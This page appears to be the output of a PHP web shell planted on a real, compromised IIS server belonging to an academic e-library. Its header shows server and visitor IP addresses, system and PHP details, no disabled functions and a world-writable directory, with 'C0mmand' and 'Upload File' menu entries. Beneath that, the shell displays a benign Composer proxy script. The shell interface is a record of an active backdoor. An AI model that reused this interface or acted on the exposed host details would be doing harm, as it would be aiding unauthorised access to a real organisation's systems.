Server IP : 103.11.96.170 / Your IP : 18.217.108.153 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : D:/localhost/online/vendor/bin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
#!/usr/bin/env php <?php /** * Proxy PHP file generated by Composer * * This file includes the referenced bin path (../symfony/var-dumper/Resources/bin/var-dump-server) using eval to remove the shebang if present * * @generated */ $binPath = realpath(__DIR__ . "/" . '../symfony/var-dumper/Resources/bin/var-dump-server'); $contents = file_get_contents($binPath); $contents = preg_replace('{^#!/.+\r?\n<\?(php)?}', '', $contents, 1, $replaced); if ($replaced) { $contents = strtr($contents, array( '__FILE__' => var_export($binPath, true), '__DIR__' => var_export(dirname($binPath), true), )); eval($contents); exit(0); } include $binPath;